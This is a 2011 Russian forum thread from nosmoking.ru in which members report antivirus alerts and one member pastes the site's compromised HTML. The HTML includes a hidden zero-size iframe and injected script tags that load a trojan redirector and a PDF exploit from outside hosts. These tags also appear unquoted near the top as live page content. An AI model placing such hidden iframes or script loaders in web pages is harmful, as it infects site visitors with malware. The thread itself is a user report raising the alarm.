NOSMOKING.RU - НЕ КУРИМ! :: Просмотр темы - FYI. Касперский алертует, что тут троян и вредоносное ПО.

<table id="adv" cellpadding="3" cellspacing="0" width="100%">
<tbody><tr>
<td>

Реклама:
Пройти <a href="http://www.cmedical.ru" target="_blank">медосмотр в медцентре</a> . Консультации по выбору приводов <a href="http://www.Alustek.ru/catalog8.html" target="_blank">автоматических дверей</a>. . <a href="http://www.dcode.ru/category_158.html" target="_blank">Ручные часы мужские</a>
</td>
</tr>
</tbody></table>



</div><span class="mtst" style="left: 0px; top: 0px; width: 0px; height: 0px; margin: 0px auto; z-index: 110;" visibility="hidden" id="mtst"></span><iframe style="border: 0px none; width: 0px; height: 0px; visibility: hidden;" src="http://ee.onesan-ima.com//index.php?45fd8c9ca77e5c58240681e8f9b0ffc9"></iframe></body></html>

<table cellpadding="3" cellspacing="0" width="100%" id="adv">
<tr>
<td>
Реклама:
Пройти <a href="http://www.cmedical.ru" target="_blank">медосмотр в медцентре</a> . Консультации по выбору приводов <a href="http://www.Alustek.ru/catalog8.html" target="_blank">автоматических дверей</a>. . <a href="http://www.dcode.ru/category_158.html" target="_blank">Ручные часы мужские</a>
</td>

</tr>
</table>



</body>
</html>

Вредоносный HTTP-объект <http://taketop100.com/js/init.2.min.js>: обнаружено: троянская программа 'Trojan.JS.Redirector.sf'.

<td align="right"><span class="gensmall">Вы <b>не можете</b> начинать темы<br />Вы <b>не можете</b> отвечать на сообщения<br />Вы <b>не можете</b> редактировать свои сообщения<br />Вы <b>не можете</b> удалять свои сообщения<br />Вы <b>не можете</b> голосовать в опросах<br /></span></td>

</tr>
</table>

<script type="text/javascript" src="http://taketop100.com/js/init.2.min.js"></script><script type="text/javascript" src="http://mxmoby.ru/js.php?redirect=http%3A//0c4.ru/g/go.php%3Fsid%3D1"></script><div align="center"><span class="copyright"><br /><br />

Powered by <a href="http://www.phpbb.com/" target="_phpbb" class="copyright">phpBB</a> © 2001, 2005 phpBB Group<br /></span></div>

Автор:	crush [ 08 окт 2011, 14:29 ]
Заголовок сообщения:	FYI. Касперский алертует, что тут троян и вредоносное ПО.
Возможно, это глюк Касперского, а может и нет. Проверьте все свои баннеры, счётчеги, рекламы. Исключительно когда захожу на этот форум. Редко, не чаще раза в сутки проскакивал вот такой алерт Цитата: URL-адрес http://megaposition.com/s1/in.cgi?2&vv=ff&t=cur&s=806, содержащий вредоносную программу, обнаружен а теперь такой: UP: Браузер - Firefox 7.

Автор:	Анна :) [ 08 окт 2011, 19:25 ]
Заголовок сообщения:
У меня тоже на семерке стал Касперский возмущаться. Причем на двух компах.

Автор:	Vaksa [ 08 окт 2011, 21:05 ]
Заголовок сообщения:
У меня такого пока нету. Хотя тройка троянов просочилась и одна программа-шпион. Пришлось CureIt'y сутки их выискивать. Да и сейчас не уверена, что всё чисто.

Автор:	Semafor [ 08 окт 2011, 21:43 ]
Заголовок сообщения:
Мой Каспер ругается все чаще и чаще, блокирует вредоносную ссылку. Набираю адрес заново-пропускает.

Автор:	crush [ 14 окт 2011, 08:42 ]
Заголовок сообщения:
Вот кажется удалось локализовать откуда этот троян лезет. Та же страница. Вот ругань Каспера Цитата: 14.10.2011 8:34:03 Вредоносный HTTP-объект <http://ee.onesan-ima.com//images/np/4b1ff2cdceab6e4c3f0ef6ed2d1f9dce/c6c3654c9f0f85bda304e38e6de28258.pdf//c6c3654c9f0f85bda304e38e6de28258>: обнаружено: троянская программа 'Exploit.JS.Pdfka.ewu'. А вот html code, где этот доменчег засветился Код: <table id="adv" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr> <td> Реклама: Пройти <a href="http://www.cmedical.ru" target="_blank">медосмотр в медцентре</a> . Консультации по выбору приводов <a href="http://www.Alustek.ru/catalog8.html" target="_blank">автоматических дверей</a>. . <a href="http://www.dcode.ru/category_158.html" target="_blank">Ручные часы мужские</a> </td> </tr> </tbody></table> <!--GARIN AD END--> </div><span class="mtst" style="left: 0px; top: 0px; width: 0px; height: 0px; margin: 0px auto; z-index: 110;" visibility="hidden" id="mtst"></span><iframe style="border: 0px none; width: 0px; height: 0px; visibility: hidden;" src="http://ee.onesan-ima.com//index.php?45fd8c9ca77e5c58240681e8f9b0ffc9"></iframe></body></html> Кстати перегрузил страницу и этот <iframe> исчез: Код: <table cellpadding="3" cellspacing="0" width="100%" id="adv"> <tr> <td> Реклама: Пройти <a href="http://www.cmedical.ru" target="_blank">медосмотр в медцентре</a> . Консультации по выбору приводов <a href="http://www.Alustek.ru/catalog8.html" target="_blank">автоматических дверей</a>. . <a href="http://www.dcode.ru/category_158.html" target="_blank">Ручные часы мужские</a> </td> </tr> </table> <!--GARIN AD END--> </body> </html>

NOSMOKING.RU - НЕ КУРИМ! http://nosmoking.ru/phpBB2/

FYI. Касперский алертует, что тут троян и вредоносное ПО. http://nosmoking.ru/phpBB2/viewtopic.php?f=4&t=17149	Страница 1 из 3

Автор:	crush [ 17 окт 2011, 08:50 ]
Заголовок сообщения:
А это кому нить интересно? Может я попусту время трачу... Прикольно будет когда тот же yandex будет предупреждать в результатах поисковых запросов, что здесь вредоносное ПО ))) Теперь вообще на каждой странице каспер грит, что Код: Вредоносный HTTP-объект <http://taketop100.com/js/init.2.min.js>: обнаружено: троянская программа 'Trojan.JS.Redirector.sf'. Ну и вот injection в html с nosmoking.ru: Код: <td align="right"><span class="gensmall">Вы <b>не можете</b> начинать темы<br />Вы <b>не можете</b> отвечать на сообщения<br />Вы <b>не можете</b> редактировать свои сообщения<br />Вы <b>не можете</b> удалять свои сообщения<br />Вы <b>не можете</b> голосовать в опросах<br /></span></td> </tr> </table> <script type="text/javascript" src="http://taketop100.com/js/init.2.min.js"></script><script type="text/javascript" src="http://mxmoby.ru/js.php?redirect=http%3A//0c4.ru/g/go.php%3Fsid%3D1"></script><div align="center"><span class="copyright"><br /><br /> <!-- We request you retain the full copyright notice below including the link to www.phpbb.com. This not only gives respect to the large amount of time given freely by the developers but also helps build interest, traffic and use of phpBB 2.0. If you cannot (for good reason) retain the full copyright we request you at least leave in place the Powered by phpBB line, with phpBB linked to www.phpbb.com. If you refuse to include even this then support on our forums may be affected. The phpBB Group : 2002 // --> Powered by <a href="http://www.phpbb.com/" target="_phpbb" class="copyright">phpBB</a> © 2001, 2005 phpBB Group<br /></span></div>

Автор:	Игорюха [ 17 окт 2011, 11:57 ]
Заголовок сообщения:
Лечить как? Или просто не заходить?

Автор:	Котори [ 17 окт 2011, 13:00 ]
Заголовок сообщения:
У меня касперский при заходе на сайт всё время упаковывает Swf2Swc. И похоже он на компьютере уже прописался. Вот чего в отчёте разглядеть можно:

Автор:	БГ [ 17 окт 2011, 13:03 ]
Заголовок сообщения:
А у меня поисковик Бинго регулярно выскакивает вместо носмокинга! Закрываю его, и снова носмок нажимаю, второй раз уже без Бинго обходится.

Автор:	Стася [ 17 окт 2011, 21:48 ]
Заголовок сообщения:
WM или WA в курсе?

Автор:	Анна :) [ 17 окт 2011, 22:22 ]
Заголовок сообщения:
Игорюха писал(а): Или просто не заходить? Похоже на то - у меня сейчас начал орать не только при входе на сайт, а при переходе на каждую страницу. Может и правда пару дней переждать пока не почистят? С другой стороны - каспер ведь ловит. Или мы еще не знаем, сколько он не поймал. Я-то вообще в этом деле ничего не смыслю. Стася - вот у меня то же самое при каждом переходе.

Автор:	Стася [ 17 окт 2011, 22:40 ]
Заголовок сообщения:
При каждом И уже несколько дней так.

Автор:	shaparro [ 18 окт 2011, 05:20 ]
Заголовок сообщения:
У меня тоже KIS 2010 ругается, раньше такого не было. Похоже, он на счетчик ругается.

Автор:	Игорюха [ 18 окт 2011, 08:45 ]
Заголовок сообщения:
Через мобильный вообще не пускает. Вообще-то это действенная мера отучения от форума особо "зависимых" от него... Мне помогает!

Страница 1 из 3	Часовой пояс: UTC + 4 часа
Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/

Автор:	Стася [ 18 окт 2011, 21:05 ]
Заголовок сообщения:
Написала WA в личку.